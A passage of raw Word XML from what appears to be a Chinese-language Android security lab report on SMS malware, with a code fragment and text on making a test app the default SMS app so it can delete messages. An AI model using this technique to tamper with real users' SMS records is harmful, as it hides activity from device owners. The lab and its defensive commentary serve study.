            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
              <w:t>Log.e("onCreate", "FAILED TO SET DEFAULT SMS APP!");</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启动本</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时，会弹出一个对话框（假设你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>名字为</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SMSTest</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41056348" wp14:editId="49007940">
            <wp:extent cx="3200400" cy="1076325"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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076325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Yes,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应用界面显示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06BE99E0" wp14:editId="5F3D5CF2">
            <wp:extent cx="3209925" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="9525"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9925" cy="1047750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此时就可以利用这个链接中的代码来删除短信了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>删除短信的方法“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="009336F3" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/beijingshi1/article/details/9094325</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C869EE" w:rsidRDefault="00E21099" w:rsidP="000C44E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的这个改进意味着恶意软件不能悄悄地改动手机的短信记录而不引起用户的注意，这对这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中的恶意软件有一定的防范作用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可见魔高一尺，道高一丈，攻防双方的</w:t>
      </w:r>
      <w:r w:rsidR="00D65EE2">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>较量</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是永无穷尽的！</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C869EE" w:rsidSect="004C50B8">
      <w:type w:val="continuous"/>
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
      <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
      <w:cols w:num="2" w:space="36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6F3" w:rsidRDefault="009336F3" w:rsidP="00105669">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009336F3" w:rsidRDefault="009336F3" w:rsidP="0010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6F3" w:rsidRDefault="009336F3" w:rsidP="00105669">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009336F3" w:rsidRDefault="009336F3" w:rsidP="00105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48BA9CD8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:pStyle w:val="1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="center"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="865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5322"/>
        </w:tabs>
        <w:ind w:left="525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A644D7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56D6AEDA"/>
    <w:lvl w:ilvl="0" w:tplc="FD0A0C68">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="宋体"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74565DD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B866618"/>
    <w:lvl w:ilvl="0" w:tplc="2752F87A">
      <w:start w:val="5"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>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4"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="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8B8"/>
    <w:rsid w:val="000019C6"/>
    <w:rsid w:val="00003422"/>
    <w:rsid w:val="000065D0"/>
    <w:rsid w:val="00007D0F"/>
    <w:rsid w:val="00007D55"/>
    <w:rsid w:val="00007E53"/>
    <w:rsid w:val="000108AB"/>
    <w:rsid w:val="00010FE6"/>
    <w:rsid w:val="00012F00"/>
    <w:rsid w:val="0001442D"/>
    <w:rsid w:val="0001582A"/>
    <w:rsid w:val="00016B4A"/>
    <w:rsid w:val="00016BE3"/>
    <w:rsid w:val="0001771F"/>
    <w:rsid w:val="000211FA"/>
    <w:rsid w:val="00026DB7"/>
    <w:rsid w:val="00030B7D"/>
    <w:rsid w:val="0003126C"/>
    <w:rsid w:val="00032F14"/>
    <w:rsid w:val="00032FC9"/>
    <w:rsid w:val="0003593B"/>
    <w:rsid w:val="00035CB9"/>
    <w:rsid w:val="00036A1D"/>
    <w:rsid w:val="00040543"/>
    <w:rsid w:val="000413B1"/>
    <w:rsid w:val="00043CEE"/>
    <w:rsid w:val="00047397"/>
    <w:rsid w:val="00050EC9"/>
    <w:rsid w:val="00051A90"/>
    <w:rsid w:val="000528B6"/>
    <w:rsid w:val="0005356A"/>
    <w:rsid w:val="00060993"/>
    <w:rsid w:val="00060A66"/>
    <w:rsid w:val="000647DC"/>
    <w:rsid w:val="00065542"/>
    <w:rsid w:val="00065609"/>
    <w:rsid w:val="00065B64"/>
    <w:rsid w:val="00067D13"/>
    <w:rsid w:val="00070F86"/>
    <w:rsid w:val="00072143"/>
    <w:rsid w:val="000749E2"/>
    <w:rsid w:val="0007613C"/>
    <w:rsid w:val="0007635B"/>
    <w:rsid w:val="0008523A"/>
    <w:rsid w:val="00086947"/>
    <w:rsid w:val="00086B2C"/>
    <w:rsid w:val="00087E2A"/>
    <w:rsid w:val="000901EE"/>
    <w:rsid w:val="00093811"/>
    <w:rsid w:val="00096241"/>
    <w:rsid w:val="00097B75"/>
    <w:rsid w:val="000A0730"/>
    <w:rsid w:val="000A0D0A"/>
    <w:rsid w:val="000A18F8"/>
    <w:rsid w:val="000A2D4C"/>
    <w:rsid w:val="000A383C"/>
    <w:rsid w:val="000A5809"/>
    <w:rsid w:val="000A682E"/>
    <w:rsid w:val="000A7BC6"/>
    <w:rsid w:val="000B19A1"/>
    <w:rsid w:val="000B1BCE"/>
    <w:rsid w:val="000B2E78"/>
    <w:rsid w:val="000B3060"/>
    <w:rsid w:val="000B3B40"/>
    <w:rsid w:val="000B5C82"/>
    <w:rsid w:val="000B63E6"/>
    <w:rsid w:val="000C26AF"/>
    <w:rsid w:val="000C44E6"/>
    <w:rsid w:val="000C5993"/>
    <w:rsid w:val="000C5A0A"/>
    <w:rsid w:val="000D76B8"/>
    <w:rsid w:val="000E01D7"/>
    <w:rsid w:val="000E0ADA"/>
    <w:rsid w:val="000E23F8"/>
    <w:rsid w:val="000E35F7"/>
    <w:rsid w:val="000E3AA7"/>
    <w:rsid w:val="000E3C1D"/>
    <w:rsid w:val="000E3C43"/>
    <w:rsid w:val="000E47EC"/>
    <w:rsid w:val="000E6473"/>
    <w:rsid w:val="000F0F2C"/>
    <w:rsid w:val="000F1948"/>
    <w:rsid w:val="000F2409"/>
    <w:rsid w:val="000F6BC8"/>
    <w:rsid w:val="000F730F"/>
    <w:rsid w:val="00105669"/>
    <w:rsid w:val="00106E21"/>
    <w:rsid w:val="00110A35"/>
    <w:rsid w:val="00110D48"/>
    <w:rsid w:val="0011115D"/>
    <w:rsid w:val="0011244E"/>
    <w:rsid w:val="00112683"/>
    <w:rsid w:val="0011348B"/>
    <w:rsid w:val="00113508"/>
    <w:rsid w:val="001136A1"/>
    <w:rsid w:val="00117959"/>
    <w:rsid w:val="00120E8D"/>
    <w:rsid w:val="001261C1"/>
    <w:rsid w:val="00127B4C"/>
    <w:rsid w:val="001304CD"/>
    <w:rsid w:val="00130D21"/>
    <w:rsid w:val="00132F26"/>
    <w:rsid w:val="0013523F"/>
    <w:rsid w:val="00135B75"/>
    <w:rsid w:val="00135EAE"/>
    <w:rsid w:val="00137530"/>
    <w:rsid w:val="001415C2"/>
    <w:rsid w:val="0014349D"/>
    <w:rsid w:val="00143BB9"/>
    <w:rsid w:val="00146126"/>
    <w:rsid w:val="00147ADF"/>
    <w:rsid w:val="00147B74"/>
    <w:rsid w:val="00154C18"/>
    <w:rsid w:val="00154FE2"/>
    <w:rsid w:val="00156924"/>
    <w:rsid w:val="00160F21"/>
    <w:rsid w:val="00163A18"/>
    <w:rsid w:val="00164E3C"/>
    <w:rsid w:val="001733E7"/>
    <w:rsid w:val="0017341E"/>
    <w:rsid w:val="00182E83"/>
    <w:rsid w:val="00184372"/>
    <w:rsid w:val="00186153"/>
    <w:rsid w:val="00186829"/>
    <w:rsid w:val="001940B0"/>
    <w:rsid w:val="001949C5"/>
    <w:rsid w:val="00196D17"/>
    <w:rsid w:val="00196DAD"/>
    <w:rsid w:val="001A1098"/>
    <w:rsid w:val="001A1B07"/>
    <w:rsid w:val="001A32A1"/>
    <w:rsid w:val="001B25A4"/>
    <w:rsid w:val="001B2FC9"/>
    <w:rsid w:val="001B364E"/>
    <w:rsid w:val="001B3FC0"/>
    <w:rsid w:val="001B43CB"/>
    <w:rsid w:val="001B45CF"/>
    <w:rsid w:val="001B64B5"/>
    <w:rsid w:val="001C29B6"/>
    <w:rsid w:val="001C41E4"/>
    <w:rsid w:val="001C5C63"/>
    <w:rsid w:val="001C6D3F"/>
    <w:rsid w:val="001C71C5"/>
    <w:rsid w:val="001C75C5"/>
    <w:rsid w:val="001C7697"/>
    <w:rsid w:val="001C7E19"/>
    <w:rsid w:val="001D1792"/>
    <w:rsid w:val="001D2740"/>
    <w:rsid w:val="001D2F57"/>
    <w:rsid w:val="001D3A9F"/>
    <w:rsid w:val="001D5E1B"/>
    <w:rsid w:val="001D5F99"/>
    <w:rsid w:val="001D72C2"/>
    <w:rsid w:val="001E4B45"/>
    <w:rsid w:val="001E545B"/>
    <w:rsid w:val="001E660A"/>
    <w:rsid w:val="001F206E"/>
    <w:rsid w:val="001F3CBD"/>
    <w:rsid w:val="001F3F21"/>
    <w:rsid w:val="001F49AB"/>
    <w:rsid w:val="001F5538"/>
    <w:rsid w:val="001F6586"/>
    <w:rsid w:val="001F71E6"/>
    <w:rsid w:val="001F7872"/>
    <w:rsid w:val="0020050D"/>
    <w:rsid w:val="00202521"/>
    <w:rsid w:val="0020641B"/>
    <w:rsid w:val="00212854"/>
    <w:rsid w:val="0021496C"/>
    <w:rsid w:val="00215A1D"/>
    <w:rsid w:val="00215DA8"/>
    <w:rsid w:val="002227E2"/>
    <w:rsid w:val="00222949"/>
    <w:rsid w:val="00222A42"/>
    <w:rsid w:val="00222B1A"/>
    <w:rsid w:val="00223751"/>
    <w:rsid w:val="0022445E"/>
    <w:rsid w:val="002254A9"/>
    <w:rsid w:val="00225983"/>
    <w:rsid w:val="002300D5"/>
    <w:rsid w:val="00230E99"/>
    <w:rsid w:val="0023465E"/>
    <w:rsid w:val="00234BCE"/>
    <w:rsid w:val="00235087"/>
    <w:rsid w:val="00236E58"/>
    <w:rsid w:val="0024279B"/>
    <w:rsid w:val="0024289A"/>
    <w:rsid w:val="00244844"/>
    <w:rsid w:val="00247190"/>
    <w:rsid w:val="00250B92"/>
    <w:rsid w:val="002533A9"/>
    <w:rsid w:val="00255D19"/>
    <w:rsid w:val="002560AC"/>
    <w:rsid w:val="00256243"/>
    <w:rsid w:val="00261E8C"/>
    <w:rsid w:val="00262C4A"/>
    <w:rsid w:val="00265973"/>
    <w:rsid w:val="002727C4"/>
    <w:rsid w:val="00272CD0"/>
    <w:rsid w:val="002745A6"/>
    <w:rsid w:val="00290682"/>
    <w:rsid w:val="00291F2A"/>
    <w:rsid w:val="00292F0C"/>
    <w:rsid w:val="0029455E"/>
    <w:rsid w:val="002A05BC"/>
    <w:rsid w:val="002A0D04"/>
    <w:rsid w:val="002A10C0"/>
    <w:rsid w:val="002A159C"/>
    <w:rsid w:val="002A2C34"/>
    <w:rsid w:val="002A33D0"/>
    <w:rsid w:val="002A5DFF"/>
    <w:rsid w:val="002A7132"/>
    <w:rsid w:val="002B180E"/>
    <w:rsid w:val="002B1CBB"/>
    <w:rsid w:val="002C1C5A"/>
    <w:rsid w:val="002C1E0A"/>
    <w:rsid w:val="002C6442"/>
    <w:rsid w:val="002C66D5"/>
    <w:rsid w:val="002C736A"/>
    <w:rsid w:val="002D0B91"/>
    <w:rsid w:val="002D1699"/>
    <w:rsid w:val="002D4203"/>
    <w:rsid w:val="002D4F19"/>
    <w:rsid w:val="002D5F87"/>
    <w:rsid w:val="002D5FD9"/>
    <w:rsid w:val="002E0062"/>
    <w:rsid w:val="002E1BDD"/>
    <w:rsid w:val="002E369A"/>
    <w:rsid w:val="002E3704"/>
    <w:rsid w:val="002E40AC"/>
    <w:rsid w:val="002E504C"/>
    <w:rsid w:val="002E50D6"/>
    <w:rsid w:val="002E517A"/>
    <w:rsid w:val="002F0448"/>
    <w:rsid w:val="002F0A8B"/>
    <w:rsid w:val="002F2886"/>
    <w:rsid w:val="002F3D5C"/>
    <w:rsid w:val="002F6EF5"/>
    <w:rsid w:val="00302A1D"/>
    <w:rsid w:val="00303B6D"/>
    <w:rsid w:val="00304023"/>
    <w:rsid w:val="00304796"/>
    <w:rsid w:val="0030777E"/>
    <w:rsid w:val="00310488"/>
    <w:rsid w:val="0031076F"/>
    <w:rsid w:val="00311599"/>
    <w:rsid w:val="003126B9"/>
    <w:rsid w:val="0031281B"/>
    <w:rsid w:val="00312844"/>
    <w:rsid w:val="00312B20"/>
    <w:rsid w:val="0031588E"/>
    <w:rsid w:val="00321459"/>
    <w:rsid w:val="00323809"/>
    <w:rsid w:val="00324CB9"/>
    <w:rsid w:val="00327666"/>
    <w:rsid w:val="00330B48"/>
    <w:rsid w:val="003325C4"/>
    <w:rsid w:val="00332BB3"/>
    <w:rsid w:val="00333D13"/>
    <w:rsid w:val="00335A52"/>
    <w:rsid w:val="00336155"/>
    <w:rsid w:val="003366A7"/>
    <w:rsid w:val="003367C1"/>
    <w:rsid w:val="00336A30"/>
    <w:rsid w:val="003400D5"/>
    <w:rsid w:val="00343049"/>
    <w:rsid w:val="00344E8E"/>
    <w:rsid w:val="00346254"/>
    <w:rsid w:val="0034633D"/>
    <w:rsid w:val="00350E98"/>
    <w:rsid w:val="00352199"/>
    <w:rsid w:val="003556EC"/>
    <w:rsid w:val="00361AD8"/>
    <w:rsid w:val="003655AA"/>
    <w:rsid w:val="003662A1"/>
    <w:rsid w:val="003710F9"/>
    <w:rsid w:val="00372CA4"/>
    <w:rsid w:val="00374B42"/>
    <w:rsid w:val="00375C72"/>
    <w:rsid w:val="003762F3"/>
    <w:rsid w:val="003766AD"/>
    <w:rsid w:val="003818AD"/>
    <w:rsid w:val="00381FCF"/>
    <w:rsid w:val="00382A89"/>
    <w:rsid w:val="0038448E"/>
    <w:rsid w:val="00384654"/>
    <w:rsid w:val="0038546C"/>
    <w:rsid w:val="00386709"/>
    <w:rsid w:val="00386FAB"/>
    <w:rsid w:val="00390102"/>
    <w:rsid w:val="003905B4"/>
    <w:rsid w:val="00390D6F"/>
    <w:rsid w:val="003921D3"/>
    <w:rsid w:val="003923DB"/>
    <w:rsid w:val="00392CC9"/>
    <w:rsid w:val="003A1099"/>
    <w:rsid w:val="003A1330"/>
    <w:rsid w:val="003A24C4"/>
    <w:rsid w:val="003A2B34"/>
    <w:rsid w:val="003A7319"/>
    <w:rsid w:val="003B3493"/>
    <w:rsid w:val="003B4539"/>
    <w:rsid w:val="003B588D"/>
    <w:rsid w:val="003B60FB"/>
    <w:rsid w:val="003B63C6"/>
    <w:rsid w:val="003B6AFD"/>
    <w:rsid w:val="003B7F1F"/>
    <w:rsid w:val="003C2539"/>
    <w:rsid w:val="003C37E8"/>
    <w:rsid w:val="003C4197"/>
    <w:rsid w:val="003C68AB"/>
    <w:rsid w:val="003D0A01"/>
    <w:rsid w:val="003D405F"/>
    <w:rsid w:val="003D76BF"/>
    <w:rsid w:val="003E3F89"/>
    <w:rsid w:val="003E7119"/>
    <w:rsid w:val="003E7A92"/>
    <w:rsid w:val="003F07E9"/>
    <w:rsid w:val="00400325"/>
    <w:rsid w:val="004014A2"/>
    <w:rsid w:val="0040395F"/>
    <w:rsid w:val="00404CED"/>
    <w:rsid w:val="00405A62"/>
    <w:rsid w:val="004060E0"/>
    <w:rsid w:val="00411995"/>
    <w:rsid w:val="00411D02"/>
    <w:rsid w:val="00412285"/>
    <w:rsid w:val="004123A8"/>
    <w:rsid w:val="00414BFC"/>
    <w:rsid w:val="0041542E"/>
    <w:rsid w:val="00420C09"/>
    <w:rsid w:val="00425241"/>
    <w:rsid w:val="0042628B"/>
    <w:rsid w:val="00426515"/>
    <w:rsid w:val="004273A6"/>
    <w:rsid w:val="00427F15"/>
    <w:rsid w:val="004317CA"/>
    <w:rsid w:val="00431FBC"/>
    <w:rsid w:val="00432A00"/>
    <w:rsid w:val="00432A61"/>
    <w:rsid w:val="00434B6D"/>
    <w:rsid w:val="00441D82"/>
    <w:rsid w:val="00444260"/>
    <w:rsid w:val="00444892"/>
    <w:rsid w:val="00446DDC"/>
    <w:rsid w:val="00447E9D"/>
    <w:rsid w:val="00452019"/>
    <w:rsid w:val="00454ACA"/>
    <w:rsid w:val="0045531E"/>
    <w:rsid w:val="00456A65"/>
    <w:rsid w:val="004601A9"/>
    <w:rsid w:val="00460DB7"/>
    <w:rsid w:val="004620CD"/>
    <w:rsid w:val="00462703"/>
    <w:rsid w:val="00462A1D"/>
    <w:rsid w:val="00462A6B"/>
    <w:rsid w:val="004643F8"/>
    <w:rsid w:val="0046741B"/>
    <w:rsid w:val="00470264"/>
    <w:rsid w:val="004716BF"/>
    <w:rsid w:val="004729E7"/>
    <w:rsid w:val="00472D2C"/>
    <w:rsid w:val="00473475"/>
    <w:rsid w:val="00473480"/>
    <w:rsid w:val="00473D30"/>
    <w:rsid w:val="004750D3"/>
    <w:rsid w:val="00475489"/>
    <w:rsid w:val="004769DA"/>
    <w:rsid w:val="00480573"/>
    <w:rsid w:val="00481FEE"/>
    <w:rsid w:val="00483C97"/>
    <w:rsid w:val="00484CE8"/>
    <w:rsid w:val="00485776"/>
    <w:rsid w:val="00485C44"/>
    <w:rsid w:val="0048696F"/>
    <w:rsid w:val="00487932"/>
    <w:rsid w:val="00492402"/>
    <w:rsid w:val="00492F90"/>
    <w:rsid w:val="004A03A2"/>
    <w:rsid w:val="004A641C"/>
    <w:rsid w:val="004A7955"/>
    <w:rsid w:val="004B1A88"/>
    <w:rsid w:val="004B239D"/>
    <w:rsid w:val="004B2C23"/>
    <w:rsid w:val="004B3958"/>
    <w:rsid w:val="004B49AD"/>
    <w:rsid w:val="004B52C0"/>
    <w:rsid w:val="004B59B3"/>
    <w:rsid w:val="004B6E6C"/>
    <w:rsid w:val="004B786F"/>
    <w:rsid w:val="004C50B8"/>
